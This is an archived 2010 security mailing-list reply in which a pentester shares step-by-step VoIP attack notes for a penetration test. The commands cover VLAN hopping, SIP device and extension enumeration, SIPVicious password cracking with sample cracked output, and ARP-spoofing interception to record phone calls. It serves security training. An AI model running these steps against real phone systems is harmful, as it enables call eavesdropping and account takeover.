Security Basics mailing list archives
Re: pentesting voip network-please help
From: Joseph McCray <joe () learnsecurityonline com>
Date: Mon, 01 Feb 2010 13:42:20 -0500
Welcome to Pentesting Marco...here are some snippets of my notes from a previous VoIP pentest of mine. There are some other things you can do as well - let me know the scope of the pentest and maybe I can help you out. ########################## # Attempt Voice VLAN Hop # ########################## wget http://www.candelatech.com/~greear/vlan/vlan.1.9.tar.gz tar -zxvf vlan.1.9.tar.gz cd vlan tshark -i eth0 -v -v "ether host 01:00:0c:cc:cc:cc and (ether[24:2] = 0x2000 or ether[20:2] = 0x2000)" | grep voice vconfig add eth0 200 # 200 is Voice VLAN ID in example ifconfig eth0.200 # Verify new interface was created dhcpd -d -t 10 eth0.200 # Try to get dhcp or voiphopper ################################## # Search for SIP enabled devices # ################################## ./smap -O [ip_address]/24 or ./svmap.py -p3478,5060,5061,8000-8100,10000 [ip_address]/24 ############## # Sipvicious # ############## ########################################### # Identify active extensions (sipvicious) # ########################################### ./svwar.py [ip_address] -e1000-2000 ################################################## # Attack the extensions found above (sipvicious) # ################################################## ./svcrack.py 2[ip_address] -u1023 -r1000-2000 ################################### # Example sipvicious walk-through # ################################### [j0e@LinuxHacktop sipvicious]$ ./svmap.py [ip_address] | SIP Device | User Agent | ------------------------------------- | [ip_address]:5060 | Asterisk PBX | [j0e@LinuxHacktop sipvicious]$ ./svwar.py [ip_address] WARNING:root:found nothing [j0e@LinuxHacktop sipvicious]$ ./svwar.py [ip_address] -e1000-2000 | Extension | Authentication | ------------------------------ | 1023 | reqauth | [j0e@LinuxHacktop sipvicious]$ ./svcrack.py [ip_address] -u1023 -r1000-2000 | Extension | Password | ------------------------ | 1023 | 1023 | ################################ # MITM for VoIP Call Recording # ################################ Window 1 arpspoof -i eth0 -t <spoofvictimip> <callmanager> Window 2 fragrouter -B1 Window 3 wireshark & (Click Statistics | RTP | Show All Streams) (Click one of the RTP steams and then select Analyze) (Click Save Payload and you can save it as a .au or .raw file) or vomit -r phone.dump | waveplay -S8000 -B16 -C1 -- Joe McCray Toll Free: 1-866-892-2132 Email: joe () learnsecurityonline com LinkedIn: http://www.linkedin.com/in/joemccray Twitter: http://twitter.com/j0emccray Website: http://www.learnsecurityonline.com New Advanced Penetration Testing Course: http://tinyurl.com/apt-course Video of my Advanced SQL Injection Presentation: http://tinyurl.com/j0e-McCray-sql-Injection "The only thing worse than training good employees and losing them is NOT training your employees and keeping them." - Zig Ziglar ------------------------------------------------------------------------ Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ------------------------------------------------------------------------
Current thread:
- pentesting voip network-please help mzcohen2682 (Feb 01)
- Re: pentesting voip network-please help Joseph McCray (Feb 01)
- Re: pentesting voip network-please help J. Oquendo (Feb 01)
- Re: pentesting voip network-please help Ivan . (Feb 02)
- Re: pentesting voip network-please help Jan Muenther (Feb 01)
- Re: pentesting voip network-please help infolookup (Feb 02)
- Re: pentesting voip network-please help Champ Clark III [Softwink] (Feb 04)
- <Possible follow-ups>
- Re: pentesting voip network-please help Duren, Preston David (Feb 01)